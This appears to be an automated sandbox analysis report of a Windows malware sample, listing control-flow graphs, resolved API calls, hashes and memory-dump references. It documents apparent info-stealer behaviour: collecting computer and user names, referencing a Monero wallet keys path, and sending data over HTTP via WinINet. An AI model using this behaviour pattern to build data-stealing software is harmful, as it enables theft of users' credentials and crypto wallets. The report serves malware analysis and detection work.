                              control_flow_graph 801 c54880-c54942 call c6a7a0 call c547b0 call c6a740 * 5 InternetOpenA StrCmpCA 816 c54944 801->816 817 c5494b-c5494f 801->817 816->817 818 c54955-c54acd call c68b60 call c6a920 call c6a8a0 call c6a800 * 2 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a920 call c6a8a0 call c6a800 * 2 InternetConnectA 817->818 819 c54ecb-c54ef3 InternetCloseHandle call c6aad0 call c59ac0 817->819 818->819 905 c54ad3-c54ad7 818->905 829 c54ef5-c54f2d call c6a820 call c6a9b0 call c6a8a0 call c6a800 819->829 830 c54f32-c54fa2 call c68990 * 2 call c6a7a0 call c6a800 * 8 819->830 829->830 906 c54ae5 905->906 907 c54ad9-c54ae3 905->907 908 c54aef-c54b22 HttpOpenRequestA 906->908 907->908 909 c54ebe-c54ec5 InternetCloseHandle 908->909 910 c54b28-c54e28 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a740 call c6a920 * 2 call c6a8a0 call c6a800 * 2 call c6aad0 lstrlen call c6aad0 * 2 lstrlen call c6aad0 HttpSendRequestA 908->910 909->819 1021 c54e32-c54e5c InternetReadFile 910->1021 1022 c54e67-c54eb9 InternetCloseHandle call c6a800 1021->1022 1023 c54e5e-c54e65 1021->1023 1022->909 1023->1022 1024 c54e69-c54ea7 call c6a9b0 call c6a8a0 call c6a800 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                                • Part of subcall function 00C547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C54915
                              • StrCmpCA.SHLWAPI(?,007FE758), ref: 00C5493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C54ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C70DDB,00000000,?,?,00000000,?,",00000000,?,007FE898), ref: 00C54DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C54E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C54E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C54E49
                              • InternetCloseHandle.WININET(00000000), ref: 00C54EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00C54EC5
                              • HttpOpenRequestA.WININET(00000000,007FE828,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C54B15
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • InternetCloseHandle.WININET(00000000), ref: 00C54ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 76293846af8661fd5ee7e5a76d99b65456cb9f5c355be0394e7f7f482dd7593b
                              • Instruction ID: dc07f7cae33fd2cc57c75b2e5d1627d453e2def008be2ac7c1a225cb633578fb
                              • Opcode Fuzzy Hash: 76293846af8661fd5ee7e5a76d99b65456cb9f5c355be0394e7f7f482dd7593b
                              • Instruction Fuzzy Hash: 6F12CB71910218AADB25EB91DDD2FEEB378AF18300F5441A9B50673091EF702F89DF66
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C67917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00C6792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 78efa7f2e0a7b50c1a10a7db041e80dca8ac5d580b4164e792c76d067d588e44
                              • Instruction ID: 66e68c1265925164d9d43159cb4e41e6715519848217f85cdf216ce1a1737471
                              • Opcode Fuzzy Hash: 78efa7f2e0a7b50c1a10a7db041e80dca8ac5d580b4164e792c76d067d588e44
                              • Instruction Fuzzy Hash: F00186B1A04204EFD724DF95DD49BAEBBF8FB04B25F10466AF545E3280C37459048BA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C511B7), ref: 00C67880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C67887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C6789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 1a7266236f372f6304a17593e78b9b982e483920d2d6b6b697f0fd923bde585f
                              • Instruction ID: 73d7b712742a023ecf6af6c35c2a58a38a15e467c3e2b5e66cf4ab0f8ee3893d
                              • Opcode Fuzzy Hash: 1a7266236f372f6304a17593e78b9b982e483920d2d6b6b697f0fd923bde585f
                              • Instruction Fuzzy Hash: 18F04FB1D44208AFC714DF99DD4AFAEBBB8EB08711F10066BFA05A3680C77419048BE1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 35c75b27a045d767cdf6b1ded2a44ee83802386cedaa6d410fcf876fe6980fea
                              • Instruction ID: baefd72a918b43fec5880499f5d905164509fb3c1ed32009ad63f4d65a45826f
                              • Opcode Fuzzy Hash: 35c75b27a045d767cdf6b1ded2a44ee83802386cedaa6d410fcf876fe6980fea
                              • Instruction Fuzzy Hash: 6BD067749042089BCB049BE1994A6EDBB78EB08616F1415A6DD0572240EA31599A8AA6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 c69c10-c69c1a 634 c6a036-c6a0ca LoadLibraryA * 8 633->634 635 c69c20-c6a031 GetProcAddress * 43 633->635 636 c6a146-c6a14d 634->636 637 c6a0cc-c6a141 GetProcAddress * 5 634->637 635->634 638 c6a216-c6a21d 636->638 639 c6a153-c6a211 GetProcAddress * 8 636->639 637->636 640 c6a21f-c6a293 GetProcAddress * 5 638->640 641 c6a298-c6a29f 638->641 639->638 640->641 642 c6a337-c6a33e 641->642 643 c6a2a5-c6a332 GetProcAddress * 6 641->643 644 c6a344-c6a41a GetProcAddress * 9 642->644 645 c6a41f-c6a426 642->645 643->642 644->645 646 c6a4a2-c6a4a9 645->646 647 c6a428-c6a49d GetProcAddress * 5 645->647 648 c6a4dc-c6a4e3 646->648 649 c6a4ab-c6a4d7 GetProcAddress * 2 646->649 647->646 650 c6a515-c6a51c 648->650 651 c6a4e5-c6a510 GetProcAddress * 2 648->651 649->648 652 c6a612-c6a619 650->652 653 c6a522-c6a60d GetProcAddress * 10 650->653 651->650 654 c6a67d-c6a684 652->654 655 c6a61b-c6a678 GetProcAddress * 4 652->655 653->652 656 c6a686-c6a699 GetProcAddress 654->656 657 c6a69e-c6a6a5 654->657 655->654 656->657 658 c6a6a7-c6a703 GetProcAddress * 4 657->658 659 c6a708-c6a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,007E5B70), ref: 00C69C2D
                              • GetProcAddress.KERNEL32(74DD0000,007E5E30), ref: 00C69C45
                              • GetProcAddress.KERNEL32(74DD0000,007F9670), ref: 00C69C5E
                              • GetProcAddress.KERNEL32(74DD0000,007F96D0), ref: 00C69C76
                              • GetProcAddress.KERNEL32(74DD0000,007F9628), ref: 00C69C8E
                              • GetProcAddress.KERNEL32(74DD0000,007F9610), ref: 00C69CA7
                              • GetProcAddress.KERNEL32(74DD0000,007EB6A8), ref: 00C69CBF
                              • GetProcAddress.KERNEL32(74DD0000,007FCFD8), ref: 00C69CD7
                              • GetProcAddress.KERNEL32(74DD0000,007FCE10), ref: 00C69CF0
                              • GetProcAddress.KERNEL32(74DD0000,007FCFA8), ref: 00C69D08
                              • GetProcAddress.KERNEL32(74DD0000,007FCF48), ref: 00C69D20
                              • GetProcAddress.KERNEL32(74DD0000,007E5E50), ref: 00C69D39
                              • GetProcAddress.KERNEL32(74DD0000,007E5BB0), ref: 00C69D51
                              • GetProcAddress.KERNEL32(74DD0000,007E5C90), ref: 00C69D69
                              • GetProcAddress.KERNEL32(74DD0000,007E5B10), ref: 00C69D82
                              • GetProcAddress.KERNEL32(74DD0000,007FD098), ref: 00C69D9A
                              • GetProcAddress.KERNEL32(74DD0000,007FCFC0), ref: 00C69DB2
                              • GetProcAddress.KERNEL32(74DD0000,007EB978), ref: 00C69DCB
                              • GetProcAddress.KERNEL32(74DD0000,007E5B90), ref: 00C69DE3
                              • GetProcAddress.KERNEL32(74DD0000,007FCEE8), ref: 00C69DFB
                              • GetProcAddress.KERNEL32(74DD0000,007FCFF0), ref: 00C69E14
                              • GetProcAddress.KERNEL32(74DD0000,007FCED0), ref: 00C69E2C
                              • GetProcAddress.KERNEL32(74DD0000,007FCE28), ref: 00C69E44
                              • GetProcAddress.KERNEL32(74DD0000,007E5BD0), ref: 00C69E5D
                              • GetProcAddress.KERNEL32(74DD0000,007FCE40), ref: 00C69E75
                              • GetProcAddress.KERNEL32(74DD0000,007FCF00), ref: 00C69E8D
                              • GetProcAddress.KERNEL32(74DD0000,007FD008), ref: 00C69EA6
                              • GetProcAddress.KERNEL32(74DD0000,007FCE58), ref: 00C69EBE
                              • GetProcAddress.KERNEL32(74DD0000,007FD050), ref: 00C69ED6
                              • GetProcAddress.KERNEL32(74DD0000,007FD0B0), ref: 00C69EEF
                              • GetProcAddress.KERNEL32(74DD0000,007FCF18), ref: 00C69F07
                              • GetProcAddress.KERNEL32(74DD0000,007FCEA0), ref: 00C69F1F
                              • GetProcAddress.KERNEL32(74DD0000,007FD080), ref: 00C69F38
                              • GetProcAddress.KERNEL32(74DD0000,007FA360), ref: 00C69F50
                              • GetProcAddress.KERNEL32(74DD0000,007FCF60), ref: 00C69F68
                              • GetProcAddress.KERNEL32(74DD0000,007FD0C8), ref: 00C69F81
                              • GetProcAddress.KERNEL32(74DD0000,007E5CF0), ref: 00C69F99
                              • GetProcAddress.KERNEL32(74DD0000,007FCF30), ref: 00C69FB1
                              • GetProcAddress.KERNEL32(74DD0000,007E57F0), ref: 00C69FCA
                              • GetProcAddress.KERNEL32(74DD0000,007FD0E0), ref: 00C69FE2
                              • GetProcAddress.KERNEL32(74DD0000,007FCF78), ref: 00C69FFA
                              • GetProcAddress.KERNEL32(74DD0000,007E5810), ref: 00C6A013
                              • GetProcAddress.KERNEL32(74DD0000,007E58D0), ref: 00C6A02B
                              • LoadLibraryA.KERNEL32(007FD020,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A03D
                              • LoadLibraryA.KERNEL32(007FCE70,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A04E
                              • LoadLibraryA.KERNEL32(007FCDF8,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A060
                              • LoadLibraryA.KERNEL32(007FD038,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A072
                              • LoadLibraryA.KERNEL32(007FCE88,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A083
                              • LoadLibraryA.KERNEL32(007FCEB8,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A095
                              • LoadLibraryA.KERNEL32(007FCF90,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A0A7
                              • LoadLibraryA.KERNEL32(007FD068,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A0B8
                              • GetProcAddress.KERNEL32(75290000,007E5830), ref: 00C6A0DA
                              • GetProcAddress.KERNEL32(75290000,007FD368), ref: 00C6A0F2
                              • GetProcAddress.KERNEL32(75290000,007F9228), ref: 00C6A10A
                              • GetProcAddress.KERNEL32(75290000,007FD380), ref: 00C6A123
                              • GetProcAddress.KERNEL32(75290000,007E5710), ref: 00C6A13B
                              • GetProcAddress.KERNEL32(73440000,007EB6F8), ref: 00C6A160
                              • GetProcAddress.KERNEL32(73440000,007E5850), ref: 00C6A179
                              • GetProcAddress.KERNEL32(73440000,007EB720), ref: 00C6A191
                              • GetProcAddress.KERNEL32(73440000,007FD218), ref: 00C6A1A9
                              • GetProcAddress.KERNEL32(73440000,007FD200), ref: 00C6A1C2
                              • GetProcAddress.KERNEL32(73440000,007E5730), ref: 00C6A1DA
                              • GetProcAddress.KERNEL32(73440000,007E5990), ref: 00C6A1F2
                              • GetProcAddress.KERNEL32(73440000,007FD260), ref: 00C6A20B
                              • GetProcAddress.KERNEL32(752C0000,007E5910), ref: 00C6A22C
                              • GetProcAddress.KERNEL32(752C0000,007E5930), ref: 00C6A244
                              • GetProcAddress.KERNEL32(752C0000,007FD398), ref: 00C6A25D
                              • GetProcAddress.KERNEL32(752C0000,007FD0F8), ref: 00C6A275
                              • GetProcAddress.KERNEL32(752C0000,007E5750), ref: 00C6A28D
                              • GetProcAddress.KERNEL32(74EC0000,007EBA90), ref: 00C6A2B3
                              • GetProcAddress.KERNEL32(74EC0000,007EBAB8), ref: 00C6A2CB
                              • GetProcAddress.KERNEL32(74EC0000,007FD320), ref: 00C6A2E3
                              • GetProcAddress.KERNEL32(74EC0000,007E59D0), ref: 00C6A2FC
                              • GetProcAddress.KERNEL32(74EC0000,007E5870), ref: 00C6A314
                              • GetProcAddress.KERNEL32(74EC0000,007EB7C0), ref: 00C6A32C
                              • GetProcAddress.KERNEL32(75BD0000,007FD1D0), ref: 00C6A352
                              • GetProcAddress.KERNEL32(75BD0000,007E5890), ref: 00C6A36A
                              • GetProcAddress.KERNEL32(75BD0000,007F9138), ref: 00C6A382
                              • GetProcAddress.KERNEL32(75BD0000,007FD338), ref: 00C6A39B
                              • GetProcAddress.KERNEL32(75BD0000,007FD3E0), ref: 00C6A3B3
                              • GetProcAddress.KERNEL32(75BD0000,007E57D0), ref: 00C6A3CB
                              • GetProcAddress.KERNEL32(75BD0000,007E59B0), ref: 00C6A3E4
                              • GetProcAddress.KERNEL32(75BD0000,007FD230), ref: 00C6A3FC
                              • GetProcAddress.KERNEL32(75BD0000,007FD2A8), ref: 00C6A414
                              • GetProcAddress.KERNEL32(75A70000,007E59F0), ref: 00C6A436
                              • GetProcAddress.KERNEL32(75A70000,007FD2D8), ref: 00C6A44E
                              • GetProcAddress.KERNEL32(75A70000,007FD248), ref: 00C6A466
                              • GetProcAddress.KERNEL32(75A70000,007FD110), ref: 00C6A47F
                              • GetProcAddress.KERNEL32(75A70000,007FD290), ref: 00C6A497
                              • GetProcAddress.KERNEL32(75450000,007E58B0), ref: 00C6A4B8
                              • GetProcAddress.KERNEL32(75450000,007E5770), ref: 00C6A4D1
                              • GetProcAddress.KERNEL32(75DA0000,007E58F0), ref: 00C6A4F2
                              • GetProcAddress.KERNEL32(75DA0000,007FD128), ref: 00C6A50A
                              • GetProcAddress.KERNEL32(6F070000,007E56B0), ref: 00C6A530
                              • GetProcAddress.KERNEL32(6F070000,007E5950), ref: 00C6A548
                              • GetProcAddress.KERNEL32(6F070000,007E5A10), ref: 00C6A560
                              • GetProcAddress.KERNEL32(6F070000,007FD188), ref: 00C6A579
                              • GetProcAddress.KERNEL32(6F070000,007E5970), ref: 00C6A591
                              • GetProcAddress.KERNEL32(6F070000,007E5A30), ref: 00C6A5A9
                              • GetProcAddress.KERNEL32(6F070000,007E57B0), ref: 00C6A5C2
                              • GetProcAddress.KERNEL32(6F070000,007E5790), ref: 00C6A5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00C6A5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00C6A607
                              • GetProcAddress.KERNEL32(75AF0000,007FD140), ref: 00C6A629
                              • GetProcAddress.KERNEL32(75AF0000,007F9268), ref: 00C6A641
                              • GetProcAddress.KERNEL32(75AF0000,007FD350), ref: 00C6A659
                              • GetProcAddress.KERNEL32(75AF0000,007FD308), ref: 00C6A672
                              • GetProcAddress.KERNEL32(75D90000,007E5A50), ref: 00C6A693
                              • GetProcAddress.KERNEL32(6F9D0000,007FD3B0), ref: 00C6A6B4
                              • GetProcAddress.KERNEL32(6F9D0000,007E5A70), ref: 00C6A6CD
                              • GetProcAddress.KERNEL32(6F9D0000,007FD278), ref: 00C6A6E5
                              • GetProcAddress.KERNEL32(6F9D0000,007FD2C0), ref: 00C6A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: 0W~$0X~$0Y~$0Z~$0^~$HttpQueryInfoA$InternetSetOptionA$PW~$PX~$PY~$PZ~$P^~$pW~$pX~$pY~$pZ~$p[~
                              • API String ID: 2238633743-3259397216
                              • Opcode ID: 60198819b0b2acf92e7084fbf76dcbe3f16094c815febcbdc9457ebe4d9c1f5d
                              • Instruction ID: 0aef47b6a437b653d206d4a7d1a850e942a7084c08898c9a44e4cbb9fa389e67
                              • Opcode Fuzzy Hash: 60198819b0b2acf92e7084fbf76dcbe3f16094c815febcbdc9457ebe4d9c1f5d
                              • Instruction Fuzzy Hash: 4F621DB5510200AFC358DFABED8996637F9FF8C20171C853BA609E3274D6399849DBD2

                              Control-flow Graph
                              • Graph rendering not reproduced. Function at 00C56280: opens a WinINet session (InternetOpenA), compares a string (StrCmpCA), connects (InternetConnectA), builds and sends a GET request (HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA), checks the response (HttpQueryInfoA), loops over InternetReadFile, and closes the three handles (InternetCloseHandle) on every exit path.
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                                • Part of subcall function 00C547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • InternetOpenA.WININET(00C70DFE,00000001,00000000,00000000,00000000), ref: 00C562E1
                              • StrCmpCA.SHLWAPI(?,007FE758), ref: 00C56303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C56335
                              • HttpOpenRequestA.WININET(00000000,GET,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C56385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C563BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C563D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C563FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C5646D
                              • InternetCloseHandle.WININET(00000000), ref: 00C564EF
                              • InternetCloseHandle.WININET(00000000), ref: 00C564F9
                              • InternetCloseHandle.WININET(00000000), ref: 00C56503
                              Strings
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: bee084ea1a29c6f27e94535269d04305a65eecd0b59a0016f57257d027cc6281
                              • Instruction ID: fbceb480e92fc0b54ada8a0e033394076d21f0f8a3191482b1700b0c307a3d24
                              • Opcode Fuzzy Hash: bee084ea1a29c6f27e94535269d04305a65eecd0b59a0016f57257d027cc6281
                              • Instruction Fuzzy Hash: 61717C75A00208AFDB24DFA0CC89BEE7774AF44701F508169F50A7B190DBB46A89CF91

                              Control-flow Graph
                              • Graph rendering not reproduced. Function at 00C65510: a loop of string-building subcalls whose results are each compared against a string with StrCmpCA; one branch calls Sleep before returning to the loop head at 00C6557C, the others fall through to cleanup and exit at 00C65AC3.
                              APIs
